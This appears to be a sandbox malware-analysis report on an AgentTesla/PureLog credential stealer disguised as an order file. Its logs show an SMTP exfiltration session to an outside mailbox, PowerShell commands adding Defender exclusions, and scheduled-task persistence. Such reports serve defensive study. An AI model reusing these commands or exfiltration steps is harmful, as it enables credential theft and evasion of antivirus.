Feb 27, 2024 10:08:59.059974909 CET | 53 | 59246 | 1.1.1.1 | 192.168.2.4
Feb 27, 2024 10:09:00.235292912 CET | 50161 | 53 | 192.168.2.4 | 1.1.1.1
Feb 27, 2024 10:09:00.541310072 CET | 53 | 50161 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 27, 2024 10:08:58.935795069 CET | 192.168.2.4 | 1.1.1.1 | 0xb49a | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 27, 2024 10:09:00.235292912 CET | 192.168.2.4 | 1.1.1.1 | 0xf091 | Standard query (0) | mail.elec-qatar.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 27, 2024 10:08:59.059974909 CET | 1.1.1.1 | 192.168.2.4 | 0xb49a | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Feb 27, 2024 10:08:59.059974909 CET | 1.1.1.1 | 192.168.2.4 | 0xb49a | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Feb 27, 2024 10:08:59.059974909 CET | 1.1.1.1 | 192.168.2.4 | 0xb49a | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Feb 27, 2024 10:09:00.541310072 CET | 1.1.1.1 | 192.168.2.4 | 0xf091 | No error (0) | mail.elec-qatar.com | | 50.87.139.143 | A (IP address) | IN (0x0001) | false
• api.ipify.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 104.26.12.205 | 443 | 7872 | C:\Users\user\Desktop\Order 19A20060.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-27 09:08:59 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-02-27 09:08:59 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Tue, 27 Feb 2024 09:08:59 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 85bf49504b300849-IAD
2024-02-27 09:08:59 UTC | 12 | IN | Data Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
    Data Ascii: 89.149.18.20


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449738104.26.12.2054431236C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-02-27 09:09:02 UTC155OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                            Host: api.ipify.org
                                                                            Connection: Keep-Alive
                                                                            2024-02-27 09:09:02 UTC | 211 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 27 Feb 2024 09:09:02 GMT
                                                                            Content-Type: text/plain
                                                                            Content-Length: 12
                                                                            Connection: close
                                                                            Vary: Origin
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Server: cloudflare
                                                                            CF-RAY: 85bf4963ead20828-IAD
                                                                            2024-02-27 09:09:02 UTC | 12 | IN | Data Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                            Data Ascii: 89.149.18.20


                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                            Feb 27, 2024 10:09:02.626132965 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 02:09:02 -0700
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Feb 27, 2024 10:09:02.626365900 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | EHLO 124406
                                                                            Feb 27, 2024 10:09:02.809456110 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 250-box2248.bluehost.com Hello 124406 [89.149.18.20]
                                                                            250-SIZE 52428800
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Feb 27, 2024 10:09:02.810695887 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                            Feb 27, 2024 10:09:02.993978977 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                            Feb 27, 2024 10:09:03.363054037 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 235 Authentication succeeded
                                                                            Feb 27, 2024 10:09:03.363245964 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                            Feb 27, 2024 10:09:03.545972109 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 250 OK
                                                                            Feb 27, 2024 10:09:03.546128988 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | RCPT TO:<richcompaniesltd@gmail.com>
                                                                            Feb 27, 2024 10:09:03.769783020 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 250 Accepted
                                                                            Feb 27, 2024 10:09:03.769928932 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | DATA
                                                                            Feb 27, 2024 10:09:03.952768087 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
                                                                            Feb 27, 2024 10:09:03.953372955 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | .
                                                                            Feb 27, 2024 10:09:04.139240026 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 250 OK id=1retSR-001bNm-2m
                                                                            Feb 27, 2024 10:09:04.561156034 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 02:09:04 -0700
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Feb 27, 2024 10:09:04.561393023 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | EHLO 124406
                                                                            Feb 27, 2024 10:09:04.744641066 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 250-box2248.bluehost.com Hello 124406 [89.149.18.20]
                                                                            250-SIZE 52428800
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Feb 27, 2024 10:09:04.744879961 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                            Feb 27, 2024 10:09:04.927278042 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                            Feb 27, 2024 10:09:05.116369963 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 235 Authentication succeeded
                                                                            Feb 27, 2024 10:09:05.116612911 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                            Feb 27, 2024 10:09:05.298774958 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 250 OK
                                                                            Feb 27, 2024 10:09:05.299921036 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | RCPT TO:<richcompaniesltd@gmail.com>
                                                                            Feb 27, 2024 10:09:05.523408890 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 250 Accepted
                                                                            Feb 27, 2024 10:09:05.523597956 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | DATA
                                                                            Feb 27, 2024 10:09:05.705705881 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
                                                                            Feb 27, 2024 10:09:05.706708908 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | .
                                                                            Feb 27, 2024 10:09:05.890171051 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 250 OK id=1retST-001bRG-1y
                                                                            Feb 27, 2024 10:10:40.253422976 CET | 49735 | 587 | 192.168.2.4 | 50.87.139.143 | QUIT
                                                                            Feb 27, 2024 10:10:40.641856909 CET | 587 | 49735 | 50.87.139.143 | 192.168.2.4 | 221 box2248.bluehost.com closing connection
                                                                            Feb 27, 2024 10:10:43.378597021 CET | 49739 | 587 | 192.168.2.4 | 50.87.139.143 | QUIT
                                                                            Feb 27, 2024 10:10:43.763777018 CET | 587 | 49739 | 50.87.139.143 | 192.168.2.4 | 221 box2248.bluehost.com closing connection


                                                                            Target ID:0
                                                                            Start time:10:08:54
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Imagebase:0xbf0000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1682974196.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.0000000003458000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1679354233.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.0000000003496000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe"
                                                                            Imagebase:0xa10000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe"
                                                                            Imagebase:0xa10000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp"
                                                                            Imagebase:0x680000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:10:08:57
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Imagebase:0x7ff71e800000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:10:08:57
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0xd0000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1714009771.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 68%, ReversingLabs
                                                                            • Detection: 38%, Virustotal
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:10:08:58
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                            Imagebase:0x7ff693ab0000
                                                                            File size:496'640 bytes
                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp"
                                                                            Imagebase:0x680000
                                                                            File size:187'904 bytes
                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0x390000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0x3c0000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:10:09:00
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            Imagebase:0x710000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false


                                                                              Execution Graph

                                                                              Execution Coverage:11.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:2.2%
                                                                              Total number of Nodes:363
                                                                              Total number of Limit Nodes:13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31fd524e9ec300d17ccbb75f7687ab9b00003b6c6beae70498208c64e87fef99
                                                                              • Instruction ID: 88bb83f3e5a151666576846aa8b94dc448cbe70eadaaa20b624cd254af5e9069
                                                                              • Opcode Fuzzy Hash: 31fd524e9ec300d17ccbb75f7687ab9b00003b6c6beae70498208c64e87fef99
                                                                              • Instruction Fuzzy Hash: 82A2C734A01229CFDB14DF68C994AD9B7B2FF89300F1581E9E549AB361DB31AE85CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6210f37bbe43e60c934ed46ff1bcdb7fcd2d784b5b577a36ee11088eec968c64
                                                                              • Instruction ID: 75e9751c20760a7b54d7cccc7e8cb02cbbf6a343aec24a0067c20a559fac7d7f
                                                                              • Opcode Fuzzy Hash: 6210f37bbe43e60c934ed46ff1bcdb7fcd2d784b5b577a36ee11088eec968c64
                                                                              • Instruction Fuzzy Hash: 56329A387012048FDB28DB69C568BAEB7F6AF89700F268469E605DB3E1DB30DD05CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b99a65e53f2380c367d8bfcffade4bbfe447150b9439692d9a19acf052f38068
                                                                              • Instruction ID: 4e3b0746a5ea409fd6f79ddb1a31e74e852e4840eea125960958b89f2b69fe28
                                                                              • Opcode Fuzzy Hash: b99a65e53f2380c367d8bfcffade4bbfe447150b9439692d9a19acf052f38068
                                                                              • Instruction Fuzzy Hash: D96147B4D1925ACBDF58EFA6C8406EDBBBABF8E300F10D029D429AB255DB345901CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0b12389c0b7fcc1a318f33afc1ff89c15cb37902c9b4d30a00d72d0a10ea389
                                                                              • Instruction ID: fc9d7a8f77f1b247090e8af4a0ac8545080ef0bbec517fb7724e8f55d4f9a8b0
                                                                              • Opcode Fuzzy Hash: a0b12389c0b7fcc1a318f33afc1ff89c15cb37902c9b4d30a00d72d0a10ea389
                                                                              • Instruction Fuzzy Hash: 12411CB4D1961ACBDB58DFAAC8406EEBBF6BF8E300F20D129D429A7255DB305901CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: decce6806b0cc7504e7bf3d211dffe0a40a3cf85b5a3ab095dcb6791cac2344d
                                                                              • Instruction ID: 889091b6b5d8423057eb911681844f6ad5327fcefd75e9d0620d9945c6393527
                                                                              • Opcode Fuzzy Hash: decce6806b0cc7504e7bf3d211dffe0a40a3cf85b5a3ab095dcb6791cac2344d
                                                                              • Instruction Fuzzy Hash: 9C21A3B1E056188BDB18CFABD8042DEBAF7AFC9300F04C13AE419AB258DB741846CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d2de1f43c125ff3d7c06ff45ffbec58c1589063d5a2bf85724837378321c0c54
                                                                              • Instruction ID: 793b79fdf0a6828e62eda7c639e44c2d0813ad38365558e672bf4fc16b261dfd
                                                                              • Opcode Fuzzy Hash: d2de1f43c125ff3d7c06ff45ffbec58c1589063d5a2bf85724837378321c0c54
                                                                              • Instruction Fuzzy Hash: C5213BB1E1561A8BDB58DF6789042EEBAB7AFC9300F14C06AC419A6265DB340A45CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d20789ef18904a33bee6cf4174725dbdf78e483da2a54ae3afa992f23a369c1d
                                                                              • Instruction ID: d5900a0e01f3f2610c03456bb3ec12126657c8057e77454039555bbd55956d29
                                                                              • Opcode Fuzzy Hash: d20789ef18904a33bee6cf4174725dbdf78e483da2a54ae3afa992f23a369c1d
                                                                              • Instruction Fuzzy Hash: 58A00240D9EA40E0C1602C121224BB4C03C121B050D037E00056B335820804C100004E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 7a300df-7a30186, internal calls to 7a82419/7a82428, 7a83bdb/7a83be0 and 7a8451b/7a84520
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 45f93e52e6d7b13f1679e68aa9fe5fadf29eae90cc5cc83f95d75b958ae09e95
                                                                              • Instruction ID: 225c33e628d95eaec4556b14868ce577fbf48f65b09c3e26254c8be659e23436
